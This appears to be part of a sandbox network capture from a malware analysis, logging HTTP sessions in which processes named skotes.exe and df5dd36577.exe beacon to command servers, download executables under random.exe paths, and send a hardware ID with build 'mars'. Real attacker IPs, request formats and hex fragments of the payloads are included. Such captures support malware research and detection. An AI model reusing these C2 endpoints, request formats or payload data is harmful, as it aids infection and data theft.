Nov 15, 2024 14:10:08.544698000 CET	1236	IN	Data Raw: 61 6c 69 66 69 65 64 43 6c 61 73 73 4e 61 6d 65 03 00 b8 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 b8 12 40 00 01 00 01 01 02 00 02 00 3a 00 e8 61 40 00 0c 46 69 65 6c 64 41 64 64 72 65 73 73 03 00 00 11 40 00 08 00 02 08 88 Data Ascii: alifiedClassName@Self@@:a@FieldAddress@@Self@Name:\b@FieldAddress@@Self@NameF]@GetInterface@@Self@@IID Obj>^@
Nov 15, 2024 14:10:08.544739008 CET	1236	IN	Data Raw: 20 40 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 20 40 00 00 00 00 00 a8 20 40 00 00 00 00 00 ae 20 40 00 08 00 00 00 b0 1f 40 00 c8 5d 40 00 d0 5d 40 00 2c 60 40 00 24 60 40 00 44 60 40 00 48 60 40 00 4c 60 40 00 40 60 40 00 68 5c 40 00 84 5c 40 Data Ascii: @ @ @ @@]@]@,`@$`@D`@H`@L`@@`@h\@\@\@WeakAttribute @WeakAttribute @ @System@!@\!@@!@F!@@]@]@,`@$`@D`@H`@L`@@`@h\@\@\@
Nov 15, 2024 14:10:08.544750929 CET	1236	IN	Data Raw: 53 65 74 53 70 69 6e 43 6f 75 6e 74 00 00 00 00 00 00 02 0a 88 1f 40 00 07 41 4f 62 6a 65 63 74 02 00 00 9c 10 40 00 0a 41 53 70 69 6e 43 6f 75 6e 74 02 00 02 00 09 18 9c 4a 00 05 45 6e 74 65 72 00 00 00 00 00 00 01 0a 88 1f 40 00 07 41 4f 62 6a Data Ascii: SetSpinCount@AObject@ASpinCountJEnter@AObjecte@Enter@@AObject@Timeout<h@Exit@AObjectj@TryEnter@@AObjectk@Wait@@AObject
Nov 15, 2024 14:10:08.544763088 CET	1236	IN	Data Raw: 29 40 00 04 09 54 44 61 74 65 54 69 6d 65 01 02 00 00 00 10 2a 40 00 04 05 54 44 61 74 65 01 02 00 00 00 20 2a 40 00 0e 0e 54 56 61 72 41 72 72 61 79 42 6f 75 6e 64 08 00 00 00 00 00 00 00 00 02 00 00 00 9c 10 40 00 00 00 00 00 02 0c 45 6c 65 6d Data Ascii: )@TDateTime@TDate @TVarArrayBound@ElementCount@LowBoundt@TVarArrayBoundArray@@PVarArray@*@TVarArray@DimCount@
Nov 15, 2024 14:10:08.544790030 CET	848	IN	Data Raw: 74 6b 44 79 6e 41 72 72 61 79 09 74 6b 55 53 74 72 69 6e 67 0a 74 6b 43 6c 61 73 73 52 65 66 09 74 6b 50 6f 69 6e 74 65 72 0b 74 6b 50 72 6f 63 65 64 75 72 65 09 74 6b 4d 52 65 63 6f 72 64 06 53 79 73 74 65 6d 02 00 00 00 00 1c 2f 40 00 0e 07 54 Data Ascii: tkDynArraytkUStringtkClassReftkPointertkProceduretkMRecordSystem/@TVarRec@VInteger@VBoolean0@VChar)@VExtended4)@VString@VPointer@VPChar@
Nov 15, 2024 14:10:08.550132990 CET	957	IN	Data Raw: 72 61 79 3c 53 79 73 74 65 6d 2e 49 6e 74 65 67 65 72 3e 04 00 00 00 00 00 00 00 03 00 00 00 9c 10 40 00 06 53 79 73 74 65 6d 9c 10 40 00 02 00 00 00 00 54 32 40 00 14 0a 50 4c 69 62 4d 6f 64 75 6c 65 68 32 40 00 02 00 00 00 6c 32 40 00 0e 0a 54 Data Ascii: ray<System.Integer>@System@T2@PLibModuleh2@l2@TLibModuleP2@Nextp@Instancep@CodeInstancep@DataInstancep@ResInstance1@TypeInfoT@Re

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49877	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:18.704678059 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 36 34 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006431001&unit=246122658369
Nov 15, 2024 14:10:19.629285097 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49883	185.215.113.16	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:19.637316942 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 15, 2024 14:10:20.556152105 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:20 GMT Content-Type: application/octet-stream Content-Length: 1848320 Last-Modified: Fri, 15 Nov 2024 12:59:13 GMT Connection: keep-alive ETag: "673745a1-1c3400" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 f6 ac 34 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ce 03 00 00 c0 00 00 00 00 00 00 00 60 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 49 00 00 04 00 00 a1 33 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 40 05 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4g`I@I3@T@hA J@.rsrc 0Z@.idata @Z@ P*P\@inlhqcme/^@dbbpexboPI@.taggant0`I"@
Nov 15, 2024 14:10:20.556262970 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:20.556282997 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:20.556298971 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:20.557519913 CET	1236	IN	Data Raw: 58 90 8d 03 44 eb 47 6e bc e8 f6 a0 61 bb 46 ac fd 18 2f e7 e2 79 12 24 d5 b9 51 ac 3a db c6 dc 67 f3 30 3b f6 ed 92 2a 7d bf a6 67 4d 77 88 23 37 20 76 2a e9 c0 c2 20 ba e2 13 c5 65 04 8c ca 22 74 41 81 bd 03 c7 e4 de e5 a7 91 f5 76 50 21 e4 80 Data Ascii: XDGnaF/y$Q:g0;}gMw#7 v e"tAvP!S#'DQR% gPP[JT[;+Akzi;BOnD\|[?g+z)^jW-.~b\|nA-jo5:WCCk[arnD-
Nov 15, 2024 14:10:20.557537079 CET	1236	IN	Data Raw: 5f 7b d3 b6 a5 e4 49 bc 04 29 47 ad c6 c8 6e 66 d8 e7 81 cb c9 e3 fb 4c d7 47 7f 0c 07 de 6a c9 d2 bb 34 da 30 a5 3a d7 83 7b b2 0c f6 91 37 84 b2 03 09 d4 35 2a 2a 63 28 0f 3f f3 cc 8b 8d 71 97 42 32 1b 5e 0a 24 1c 2f 16 01 be 77 90 57 59 8e e3 Data Ascii: _{I)GnfLGj40:{75*c(?qB2^$/wWY{NN>O'cHRg+cOqo;AeaA-xz)r50id~3\|L)$$kTH[tCUI1rn~
Nov 15, 2024 14:10:20.557552099 CET	1236	IN	Data Raw: a0 0a 0d a1 ca ff aa 13 75 d0 17 64 79 10 48 be f9 86 a1 aa df ea d2 25 13 ee b7 d5 1d 3f 43 ad 33 09 4c bb fb 52 cc 90 df 08 3a 69 3e 80 07 90 86 49 d3 35 e0 8e d2 35 ff ea 18 a4 36 e8 17 88 34 e6 5e 91 f0 e6 5e 9b 0c f3 16 ab 3a 40 2f 92 8a 66 Data Ascii: udyH%?C3LR:i>I5564^^:@/fsjH}O%S::=81 x9{snb?%}Ddd?tP@aH .O93>u}v+\,?'mVuE~1
Nov 15, 2024 14:10:20.558614969 CET	1236	IN	Data Raw: 64 40 01 6a 17 3a de 47 79 fe d6 28 df 6b e1 34 9b b3 32 a2 a2 ff c7 b1 dd 8e 8e 30 f0 6e c1 53 f9 fe a6 98 ad 36 f0 9b f7 f1 34 a4 c4 88 54 8a f7 f4 a1 2f ba ed 14 c8 7d e0 26 93 d8 03 8c 36 e4 ef c6 25 8b fd 96 db 66 d8 39 e8 b6 14 a9 e1 77 e9 Data Ascii: d@j:Gy(k420nS64T/}&6%f9wYD8@/nNVAWbLRX ?vrhT:U)FXF0v\|kL&u5$M$0gQ-]1dw7jjgQCng8
Nov 15, 2024 14:10:20.558630943 CET	1236	IN	Data Raw: e6 9f 82 01 fa 16 8f 64 ee 04 75 aa 38 cf 5d 60 2b 82 56 c1 fc 18 d3 d0 ca c5 d7 f9 49 00 6a d8 8c cd dd 25 8d 22 40 a2 db f3 69 fa b4 d2 e6 c8 e3 75 87 6a e8 e5 04 ca 70 a2 f4 88 ab 76 51 93 85 48 97 da cb 36 51 d4 3b 08 55 c3 23 8a 0e 60 a1 bf Data Ascii: du8]`+VIj%"@iujpvQH6Q;U#`BV/vPgxSbbn@,n\|&n>6HX[(4xHA?J+CSLt'D@9rC5o\pH?J
Nov 15, 2024 14:10:20.558646917 CET	1236	IN	Data Raw: e2 45 99 4b a5 fb f5 2a 9c a0 16 cb a9 04 76 3d e5 cf 3b b2 f5 a5 d3 35 4d f5 b0 dc 8c 09 84 6a 27 08 7e 29 ba 85 6a a0 62 51 b3 5e 99 30 99 f2 e6 12 1b fd d8 5e 6f e8 b0 6b 4e ef b4 ea 92 db bc 7a c6 d1 58 fd b6 8a 58 d8 ae 23 b9 14 d7 28 a2 e3 Data Ascii: EK*v=;5Mj'~)jbQ^0^okNzXX#(6!fewse8gtl}QoWoQzfP'+zl1\|k6\|Q%&rW"w+`LUF"'Is7>GRIu{#
Nov 15, 2024 14:10:20.566461086 CET	1120	IN	Data Raw: f9 9b 6f 6f 8b 2b d5 85 18 8b 99 01 f8 a9 7e 34 dc b9 11 55 d5 f4 c4 f7 6a 7d b1 95 a0 b6 60 d8 ed 94 46 dd de 69 17 bd 1d 13 4d ea f1 e8 d2 63 9a 98 8e ba f9 a8 37 d7 77 90 6e 6a 97 fb 3d d9 7f b0 6a 39 52 43 f7 21 4d fb 7c aa db 0d 5b 58 a1 53 Data Ascii: oo+~4Uj}`FiMc7wnj=j9RC!M\|[XSqpF9DEe:=UjmJx]`oA`s4u@$RI+udspk_LQ_$?P7aplBI}\}I{+wGR,H:&S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49927	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:28.027863026 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 36 34 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006440001&unit=246122658369
Nov 15, 2024 14:10:28.925992012 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49934	185.215.113.16	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:28.939712048 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 15, 2024 14:10:29.861135006 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:29 GMT Content-Type: application/octet-stream Content-Length: 1812480 Last-Modified: Fri, 15 Nov 2024 12:59:20 GMT Connection: keep-alive ETag: "673745a8-1ba800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 80 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 69 00 00 04 00 00 1e 22 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"i@i"@M$a$ $b@.rsrc $r@.idata $r@ *$t@ylgrvzmt`Ov@sdrnsjgbpi@.taggant0i"@
Nov 15, 2024 14:10:29.861465931 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:29.861500978 CET	424	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:29.862334967 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:29.862521887 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: G*UH9
Nov 15, 2024 14:10:29.862555981 CET	424	IN	Data Raw: 65 ef 94 57 14 ec ba 2b 23 0f e4 3e 13 d7 4f 45 69 ec 21 f1 f9 67 24 a6 a4 dc 14 23 55 1b a5 e5 7d b1 b6 3e 30 da 82 87 4a 5c 20 07 2e 2e a8 64 8a bf 2d f6 ca 06 7e d7 bb 55 ac 2f c5 e5 16 20 88 53 f6 cd 7a 3a ce 9f 30 d5 8d 39 57 fe a4 f7 ba 8b Data Ascii: eW+#>OEi!g$#U}>0J\ ..d-~U/ Sz:09We'_%M&%mZSX':c.#SgmF{7V&eV >Z!Qvb9PX6%>$!gY#L_Fq+;-L&lqh%Z"3,\/c8"`;$(
Nov 15, 2024 14:10:29.862648010 CET	1236	IN	Data Raw: fd eb 17 ff 41 c9 2a 24 9b a8 bb c4 4c e3 a0 21 d6 27 6b c6 09 2a 32 2b c1 78 56 3b 5d f7 be 18 c8 15 72 21 11 2a e7 e2 62 bb a2 a4 60 15 fa 68 7e 20 cf 0e 9c 56 44 a6 53 fa f9 35 60 dc b6 62 5c 56 47 e7 46 ff 2f 8f 77 d4 d6 26 a9 1c b1 5c 0d f0 Data Ascii: A$L!'k2+xV;]r!*b`h~ VDS5`b\VGF/w&\Ti:!@SGT`Mk'`B/s{/KC!g[ Nm+-,A\,6e~awMG:-J[a(=U#i%9NxeH\@S?VF
Nov 15, 2024 14:10:29.862682104 CET	212	IN	Data Raw: c7 84 de e3 ba db 76 7a 67 df 92 84 61 d7 a3 82 39 df 69 22 b1 fb eb ff e3 28 ae 94 86 df 8d 19 78 4e 2d c1 81 05 de e2 b2 a4 dc 82 47 44 b1 e2 bb 54 e3 14 05 f7 ea 4b 8b 5f c8 69 aa 55 6b 3a 8a f5 1c 8f 67 d6 72 fc 73 77 12 87 67 d6 4c 03 7d 3f Data Ascii: vzga9i"(xN-GDTK_iUk:grswgL}?^`Jm`Wa62jK\q#$dL;dh'e'[,VUbT'/s&wfZMY#U\|"aG-3(VrTI_O&/G
Nov 15, 2024 14:10:29.864900112 CET	1236	IN	Data Raw: 08 29 43 f7 d2 23 a4 d9 e9 56 53 13 46 c5 21 47 d0 a9 ce e2 10 9a 03 d9 06 b3 af 86 48 41 2c 4d b9 ab f5 44 86 a8 5c 25 32 e0 3f 14 1d 15 af 33 4c c9 ef 4a 97 76 33 52 d2 fa b2 f4 4d f1 a3 bb 45 3b ca 72 0d fb e9 35 8f 95 05 88 4a 80 dc b4 87 08 Data Ascii: )C#VSF!GHA,MD\%2?3LJv3RME;r5JoJ}sPb2#ECKeU'6~$av4zU[XcVg[JM`X"yW^#kXQ^#adz'5S[;4l
Nov 15, 2024 14:10:29.864939928 CET	1236	IN	Data Raw: 91 57 e5 ea 66 07 b9 22 55 29 b9 33 b1 11 c5 9e 97 f1 29 dd c5 ec b2 a6 c9 b3 2b 5d 4a 18 e7 ba 67 87 b3 fe ce 5b 92 29 db 45 07 35 69 dd b8 5e a0 dc 7b 29 ab 45 e5 34 85 e9 2a 57 d2 96 27 db c9 c3 e7 0e 67 b7 2d 25 f2 63 b9 1a 68 5c b7 e8 69 8b Data Ascii: Wf"U)3)+]Jg[)E5i^{)E4W'g-%ch\ip36N w^uG\|[c=W(tNBrU4[/5UuT3%BB\D%)IK.(Bl7W%)Iaijcr^&yM>XMjW+;o,7)
Nov 15, 2024 14:10:29.869101048 CET	1236	IN	Data Raw: 6a d5 b2 0a 5c f4 06 23 05 5b 85 57 a4 57 ac 1a 5b 9b e7 b6 67 9f b4 18 65 39 d5 96 30 e5 9a 24 fb 19 b9 ee 95 0b b9 52 c9 f5 0e 9d 8a 73 ac 99 ff 31 e5 33 95 e7 6e 2c 6e 5a e8 22 9d 5b 03 58 d1 dd b8 83 8a 21 d3 9a b5 17 b7 34 a0 fd 63 a7 bd e9 Data Ascii: j\#[WW[ge90$Rs13n,nZ"[X!4cM+ewW#)_,BK[[Z^{2[-r)Nx[S\|@EU6PQJW.vgY)`"WKL/}qweD$Bk[;5FSM("9"9]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49989	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:37.839791059 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 36 34 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006441001&unit=246122658369
Nov 15, 2024 14:10:38.737464905 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49990	185.215.113.206	80	6216	C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:38.073214054 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 15, 2024 14:10:38.978456974 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 15, 2024 14:10:38.981267929 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCB Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 43 46 32 31 31 36 46 38 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 2d 2d 0d 0a Data Ascii: ------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="hwid"BCCF2116F8A11720009369------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="build"mars------GDHDHJEBGHJKFIECBGCB--
Nov 15, 2024 14:10:39.263703108 CET	210	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49996	185.215.113.16	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:38.955075026 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Fri, 15 Nov 2024 12:59:20 GMT If-None-Match: "673745a8-1ba800"
Nov 15, 2024 14:10:39.902163029 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:39 GMT Last-Modified: Fri, 15 Nov 2024 12:59:20 GMT Connection: keep-alive ETag: "673745a8-1ba800"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50009	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:41.798410892 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 36 34 34 32 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006442031&unit=246122658369
Nov 15, 2024 14:10:42.696394920 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50016	185.215.113.16	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:42.718405962 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 15, 2024 14:10:43.646256924 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:43 GMT Content-Type: application/octet-stream Content-Length: 2790400 Last-Modified: Fri, 15 Nov 2024 12:57:55 GMT Connection: keep-alive ETag: "67374553-2a9400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 14 b3 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+`Ui` @ @.rsrc`2@.idata 8@fnateuls@4:@eutlwerm n@.taggant@+"r@
